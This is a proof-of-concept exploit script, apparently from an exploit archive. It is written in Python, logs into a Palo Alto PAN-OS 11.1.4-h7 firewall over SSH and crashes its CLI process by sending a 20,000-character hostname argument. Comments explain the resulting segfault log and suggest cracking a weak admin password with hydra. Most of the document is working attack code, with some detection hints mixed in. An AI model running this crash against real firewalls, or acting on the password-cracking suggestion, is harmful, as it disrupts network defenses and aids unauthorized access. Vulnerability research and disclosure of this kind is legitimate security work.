Palo Alto 11.1.4-h7 Memory Corruption
Palo Alto 11.1.4-h7 Memory Corruption
#!/usr/bin/env python3
# post auth cli memory corruption poc for paloalto 11.1.4-h7
#
# 19.01.2025 @ 00:23
#

# a post-auth user (in general 'admin'*, but we'll get back to that later ;))
# can use the cli to run one of the menu commands with a too-long hostname
# as the <value> parameter.
#
# that will crash the current cli process and the session will be terminated.
# the segfault error can be found in the 'messages' log file. for details try:
# paloalto> less mp-log messages
#
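# example log:
# Jan 18 09:28:06 PA-VM kernel: [ 5822.319982] cli[14441]: segfault at 7ffe5c048ff8
# ip 00007f111d428c94 sp 00007ffe5c049000 error 6 in libchicken.so[7f111d230000+293000]
#
# reading the log: the faulting address is 8 bytes below sp, and on x86 'error 6'
# means a user-mode write to an unmapped page. that is consistent with the cli
# running out of stack inside libchicken.so; the log alone does not show a
# controlled overwrite. a 'cli[...]: segfault ... in libchicken.so' line is the
# entry to alert on.
#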
# *(with simple-enough password for admin - hydra should break it)
#
# More: https://code610.blogspot.com/2025/05/palo-alto-postauth-cli-memory.html
#

import netmiko
from netmiko import ConnectHandler
import getpass
import sys

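# Reproduces the post-auth CLI crash described in the header against one host,
# so that a PAN-OS build under your administration can be checked for the bug.
#
# Usage: <script> <target-host>
# The login name is fixed to 'admin'; the password is read from the terminal.

if len(sys.argv) != 2:
    sys.exit("usage: %s <target-host>" % sys.argv[0])

target = sys.argv[1]
login = 'admin'
# Prompt for the password rather than keeping a credential in the source file,
# where it would end up in version control and shell-visible copies.
password = getpass.getpass("Password for %s@%s: " % (login, target))

firewall = {
    "device_type": "paloalto_panos",
    "host": target,
    "username": login,
    "password": password,
}

# init connection
connection = ConnectHandler(**firewall)  # unpacking the dictionary
print("[+] Connected to target host: %s" % target)

print("[i] Sending crash command...")

# Over-long <value> argument for the hostname parameter of the cli command.
kab00m = "A" * 20000
crash = "test http-server address " + kab00m
try:
    connection.send_command(crash, expect_string=r">")
except netmiko.exceptions.ReadTimeout:
    # No prompt came back. A timeout on its own is a weak signal (a slow link
    # gives the same result); the segfault line in 'messages' is the proof.
    print("[-] ReadTimeout() error - remote cli should be crashed. Check 'messages' for details.")
else:
    # The prompt returned, so the cli process survived the command.
    print("[i] Prompt returned - remote cli did not crash.")
finally:
    # Always release the SSH session. After a crash the channel may already be
    # gone, so a failure here is expected and deliberately ignored.
    try:
        connection.disconnect()
    except Exception:
        pass
print("[+] Done. Good luck!")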
#
# o/
#